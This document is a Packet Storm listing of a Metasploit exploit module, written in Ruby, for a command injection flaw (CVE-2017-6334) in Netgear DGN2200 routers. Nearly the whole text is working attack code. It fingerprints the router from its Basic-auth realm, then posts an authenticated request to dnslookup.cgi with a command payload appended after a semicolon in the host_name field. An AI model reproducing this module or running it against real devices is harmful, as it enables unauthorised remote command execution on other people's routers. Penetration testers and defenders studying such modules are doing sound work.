
Netgear DGN2200 dnslookup.cgi Command Injection

2017-06-24 00:00:00
SivertPL
packetstormsecurity.com

EPSS: 0.967 (percentile 99.7%)

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'net/http'  
require "base64"  
  
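class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Hardware revisions named in the advisory (EDB 41459 / CVE-2017-6334). The
  # only fingerprint available to `check` is the model string the router puts
  # in its HTTP Basic realm, so that string is matched against this list.
  VULNERABLE_MODELS = %w[DGN2200v1 DGN2200v2 DGN2200v3 DGN2200v4].freeze

  def initialize(info = {})
    super(update_info(info,
      'Name' => "Netgear DGN2200 dnslookup.cgi Command Injection",
      'Description' => %q{
        This module exploits a command injection vulnerablity in NETGEAR
        DGN2200v1/v2/v3/v4 routers by sending a specially crafted post request
        with valid login details.
      },
      'License' => MSF_LICENSE,
      'Platform' => 'unix',
      'Author' => [
        'thecarterb', # Metasploit Module
        'SivertPL' # Vuln discovery
      ],
      'DefaultTarget' => 0,
      'Privileged' => true,
      'Arch' => [ARCH_CMD],
      'Targets' => [
        [ 'NETGEAR DDGN2200 Router', { } ]
      ],
      'References' =>
        [
          [ 'EDB', '41459'],
          [ 'CVE', '2017-6334']
        ],
      'DisclosureDate' => 'Feb 25 2017',
    ))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('USERNAME', [true, 'Username to authenticate with', '']),
        OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
      ])

    register_advanced_options(
      [
        OptString.new('HOSTNAME', [true, '"Hostname" to look up (doesn\'t really do anything important)', 'www.google.com'])
      ])
  end

  # Fingerprints the device from the Basic-auth challenge on `/`. The realm
  # carries the model name (`Basic realm="NETGEAR DGN2200v3"`); nothing in
  # that response distinguishes patched from unpatched firmware, so the
  # strongest result this can return is Detected, never Vulnerable.
  #
  # @return [CheckCode] Detected for a DGN2200v1-v4 realm, Unknown when the
  #   target does not answer, Safe otherwise.
  def check
    res = send_request_cgi('uri' => '/')
    if res.nil?
      # Return rather than fail_with so `check` is usable on its own; the
      # exploit path turns Unknown into Failure::Unreachable.
      vprint_error('Connection timed out.')
      return CheckCode::Unknown
    end

    challenge = res.headers['WWW-Authenticate']
    unless challenge
      print_error('Router is not a NETGEAR router')
      return CheckCode::Safe
    end

    # Read the model out of the header value itself instead of scanning the
    # whole serialized response; `[^"]+` stops at the realm's closing quote.
    model = challenge[/Basic realm="NETGEAR ([^"]+)"/, 1]
    unless model
      print_error("Unexpected realm, not a NETGEAR router: #{challenge}")
      return CheckCode::Safe
    end

    vprint_status("Router is a NETGEAR router (#{model})")
    unless VULNERABLE_MODELS.include?(model)
      vprint_status("NETGEAR #{model} is not a DGN2200v1-v4")
      return CheckCode::Safe
    end

    print_good("Router may be vulnerable (NETGEAR #{model})")
    CheckCode::Detected
  end

  # Authenticates with HTTP Basic and posts the payload to dnslookup.cgi,
  # appended to HOSTNAME behind a `;` so the CGI's lookup command executes it.
  #
  # @raise [Msf::Exploit::Failed] Unreachable when the target does not answer
  #   the fingerprint request, NotVulnerable when it is not a DGN2200v1-v4,
  #   NoAccess when the router rejects the credentials.
  def exploit
    # Do not fire blind: the injection only applies to the DGN2200 family, so
    # anything other than a Detected check aborts before the POST goes out.
    code = check
    fail_with(Failure::Unreachable, 'Connection timed out.') if code == CheckCode::Unknown
    unless code == CheckCode::Detected
      fail_with(Failure::NotVulnerable, 'Target does not identify itself as a NETGEAR DGN2200v1-v4 router')
    end

    user = datastore['USERNAME']
    pass = datastore['PASSWORD']
    hostname = datastore['HOSTNAME']

    vprint_status("Using encoder: #{payload.encoder} ")
    # Only the username is logged; the password, and its Base64 form (which
    # is the same secret), stay out of the console output.
    vprint_status("Authenticating as #{user} with HTTP Basic")
    creds_combined = Base64.strict_encode64("#{user}:#{pass}")

    print_status('Sending payload...')
    res = send_request_cgi({
      'uri' => '/dnslookup.cgi',
      'headers' => {
        'Authorization' => "Basic #{creds_combined}"
      },
      'vars_post' => {
        'lookup' => 'Lookup',
        'host_name' => "#{hostname}; #{payload.encoded}"
      }
    })

    if res.nil?
      # Presumably the injected command runs inside the CGI request, so a
      # long-lived payload may hold the response past the HTTP timeout; a
      # missing response is therefore not treated as a failure here.
      vprint_status('No HTTP response within the timeout; the payload may still be running')
    elsif res.code == 401
      fail_with(Failure::NoAccess, "Router rejected the credentials for #{user} (HTTP 401)")
    else
      vprint_status("Router answered with HTTP #{res.code}")
    end
  end
end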
`